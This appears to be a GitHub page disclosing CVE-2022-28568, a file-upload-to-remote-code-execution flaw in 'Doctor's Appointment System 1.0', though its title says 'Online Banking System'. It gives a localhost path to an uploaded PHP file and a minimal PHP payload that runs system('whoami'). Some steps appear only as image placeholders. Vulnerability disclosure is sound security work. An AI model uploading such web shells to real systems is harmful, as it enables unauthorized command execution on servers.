Skip to content

Latest commit

 

History

History

CVE-2022-28568

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Tittle: Online Banking System (File Upload to RCE)

Author: (B3nj1)

Version: 1.0

CVE:

  • Description: Doctor's Appointment System 1.0 is vulnerable to File Upload to RCE via Image upload from the administrator panel. An attacker can obtain remote command execution just by knowing the path where the images are stored.

Steps to reproduce:

image

  • 3- Going to that url we will execute the code

http://localhost/doctors_appointment/assets/img/1651595100_b3nj1.php

image

Payload

<?php
echo system('whoami');
echo "\nits working!!";
?>